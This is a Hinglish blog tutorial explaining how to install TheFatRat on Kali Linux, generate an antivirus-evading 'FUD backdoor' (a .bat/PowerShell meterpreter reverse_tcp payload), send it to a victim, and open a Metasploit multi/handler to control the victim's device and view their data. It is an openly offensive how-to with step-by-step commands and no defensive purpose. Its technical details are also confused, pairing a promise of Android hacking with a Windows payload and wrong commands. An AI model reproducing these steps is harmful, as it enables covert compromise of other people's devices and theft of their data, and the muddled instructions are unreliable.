FatRat Tool Kya Hai | Iski Madad Se Android Phone Kaise Hack Kare ?

Hello friends aaj mai aapko batane wala hu ki Fatrat Tool kya hai aur isse Android Smartphone ko kaise hack kare. Waise tho Android Phone ko hack karna bahut muskil hai, but jab se Kali Linux ko banaya gaya hai tab ye kaam aasan ban gaya hai.



Friends ham Kali Linux se bahut kuch kar sakte hai. Kyuki isme bahut se useful features or Tools milte hai. Yaha hamhe 500 se jyada tools milte hai. Ab baat karte hai Fatrat Tool ke baare me ki kaise Kali Linux me Install karke kisi bhi Android Smartphone ho hack kar sakte hai. Tho chaliye friends first jante hai ki ye Fatrat Tool hai kya

● Kali Linux Kya Hai Aur Android Mobile Me Kaise Install Kare ?
 Virus Send Kar Computer Ko Kaise Hack Kare ?

FatRat Tool Kya Hai | What is FatRat Tool in Hindi

fatrat-tool-kya-hai

Mann ligiye ki aap Kali Linux ke madad se Ek Virus banaya hai. Jo ki ham kisi bhi Mobile me Install karwa ke uska saara data pana chahate hai, but hota kya hai ki us mobile ka Antivirus us Virus ko Detect Kar leta hai aur mobile me Notification dekhayi deta hai ki Aapke Mobile me Virus Run ho raha hai. Bass ab wo is Antivirus ki madad se us Virus ko Remove kar deta hai. Aur hamhari poori mehanat kharab ho jati hai. 




Isiliye ham Fatrat ko pehle Kali Linux me Install karte hai. Kyuki Koi bhi Virus bana kar kisi bhi smartphone me dalenge tho us mobile ka Antivirus ise detect nahi kar payega aur hamhara kaam aasan ho jayega.

Friends ye tool bahut aasani se kisi bhi Antivirus aur Security software me bypass bana leta hai. Is tool ki sabse important baat ye hai ki iski madad se ham kisi bhi security ko hack kar sakte hai chahe wo Windows ho ya Linux ya Mac ya phir Android. Ye isi kaam ke liye banaya Gaya hai. Aapko bass isse Payload Virus ko create karna hota hai aur kisi bhi tarah victim ke mobile me send karna hai. Tho Chaliye friends jante hai ki Payload Virus kaise banate hai.

● Hacker Kaise Bane | Hacking Sikhne Ke Top 10 Tips
● Hackers Use Karne Ke Top 7 Operating Systems

Create Payload Virus To Hacking Any Android Mobile


Step 1 : Sabse aap Kali Linux ko Apne Computer me Install karle.

Step 2 : Ab Kali Linux Ko Open Kare aur Uske Terminal ko Open kare uske baad niche diye command ko type kare.
      Cd desktop/
Step 3 : aap ko Kali Linux Me FatRat Ko Install karna hai. Uske liye niche diye command ko type kare.

Kali linux-/desktop# git clone http://www.github.com/screensec/theFatrat.git
Ye jo upar url hai wo FatRat tool ka Location hai.

Step 4 : Ab FatRat tool download hona start ho jayega aur aapke Desktop par iski File show hone lagegi. Ab aapke Internet Connection par depend karta hai ki ye kitne time me Install hota hai.




Step 5 : File download hone ke baad aap phir se terminal open kare aur niche diye Command type kare
Cd theFatRat/

 Step 6 : jaise hi aap Enter press karoge waise hi aapke samane ek window open hogi. Isme aapke aap ko FatRat tool ko apne System me Install karna hota hai. Iske Simply ye Command type kare chmod +x setup.sh ab Enter press kare. Iske baad aapko ek aur Command dena hoga ./setup.sh or enter press kar de.


Step 7 : Ab installation Process start ho jata  hai aur ye kuch time leta hai. Jab ye finish ho jata hai tho aapke samane ek Pop-up open hoga jisme ye location ke liye puchega aap yaha ignore pe click karna hai iske liye aap Yes button dabaye.

Step 8 : Ab aapke samane ek screen open hogi jisme bahut saare option honge. Ye yahi puch raha hai ki aap kis Operating system ko hack karne ke liye Virus bana rahe hai tho ham yaha pe Android System ko hack karne ke liye Payload bana rahe hai aur aap simply is Terminal ko close kar de.



Friends aapne Fatrat tool poori tarah se Kali Linux me Install kar liya hai. Ab yaha pe baat ye aati hai ki isase ham Android Smartphone ko kaise hack kare. Iske liye aapko Fud Backdoor banana padega, tho chaliye friends jante hai ki kaise Fud Backdoor banate hai.

FUD Backdoor Kaise Banaye

Step 1 : Apne PC me Kali Linux ke Terminal ko open kare. Phir usme FatRat  Command Type kare aur Enter press kare. Ab yaha pe kuch process hoga uske baad ye aap ko ek Warning dega aap ise ignore karde [Ise ignore karne ke liye Enter press kare] iske baad ek new window open hogi isme bhi aap simply Enter press kar de.

Step 2 : Ab aata hai hamhara main kaam yaha pe aapko bahut saare options dekhayi denge but hamhe Undetectable Backdoor ko create karna hai. Iske liye aap ko 6 number wale Option ko select karna hai [Create Fud Backdoor 100% with pwnwinds] aur phir Enter button press kare.




Step 3 : yaha pe ek or menu open hoga but hamhe Create A Bat File+Powershell ko select karna hai. Jo ki is menu ka no 1 option hoga aap isko select kare aur Enter press kare.

Step 4 : Ab aapko Lhost ke baare me puchega aur aap ko apna IP Address type karke enter press karna hai. Agar aapko Apne Computer ka IP Address nahi pata hai tho aap Ek aur Terminal open kare aur ipconfig command type kare aur aap ko aapka IP Address dekhayi dega.

Step 5 : Ab ye aapse Lport puchega aap yaha kuch bhi type kar sakte hai jaise ki 4444 [Computer ka Default Port number ] iske baad ye aapse Backdoor jo ham bana rahe hai uska name puchega tho aap apne marji ka name de sakte hai.
Example : HMIpayload

Step 6 : Ab ek new window open hogi waha pe aapko windows/meterpreter/reverse_tcp isko select karna hai aur Enter press karna hai. Ab kuch der wait kare, ye process complete hone ke baad aapse puchega ki aap ko isme si Exit hona hai ya Nahi aap No pe click karde.

Step 7 : Ab aap apne Desktop pe jaye aur waha FatRat folder hoga use open kare phir Output folder ko open kare. Aap waha dekh sakte hai ki HMIpayload.bat file create hua hoga [hamne jo command me name diya wo name se file ban gaya hoga ]




Friends hamne Payload file bana liya hai. Hamhe ise kisi bhi tarah se Victim ke mobile me send karna hai. Jab Victim aapke payload pe click karega tho ye virus apna kaam karna start kar dega aur aap victim ka mobile hack kar liya hai.

Agar aap nahi jante hai ki Victim ki details kaise dekhe tho Don't Worry. Aap sabse pehle Kali linux ke Terminal ko open kare aur fatrat command type karke Enter dabaye aur phir ye apna menu bar open kar dega. Ab aap ko jump to msfconsole is command ko find karna hoga aur jab ye open hoga jayega tab aap multi/hander command type karke enter dabaye. Aur jab ye open hoga tho aap set payload windows/meterpreter/reverse_tcp command ko execute karna hai. Ab aapko apna Lhost set karna hoga iske liye aap set lhost 198.168.1.1 [yaha pe aapko apna IP Address type karna hai] phir iske baad Enter press karna hai. Phir iske baad run command type karke Enter dabaye aur aapka saara kaam ho jaya hai. Ap victim ki saari details apne terminal me dekh sakte hai.

Also read : 
● Hacking Kya Hai | Kya Ye Legal Hai Ya Illegal ?
● Phishing Attack Kya Aur Ise Kaise Bache ?
● Top 7 Applications For Not Rooted Android Phone

Friends aaj hamne jana ki kaise ham FatRat tool install karke kisi bhi Android Smartphone hack kar sakte hai. Agar aapko is post me kahi bhi koi problem ho rahi hai tho aap comment me bataye aur ham aapki jaroor help karenge.

 Thank you for reading


Post a Comment

3 Comments

  1. Sir terminal ko use karte time pc me internet hona chahiye ya nahi

    ReplyDelete
    Replies
    1. Yeh aapke uper depend karta hai ki aap kaisa work kar rahe hai terminal ke trough

      Delete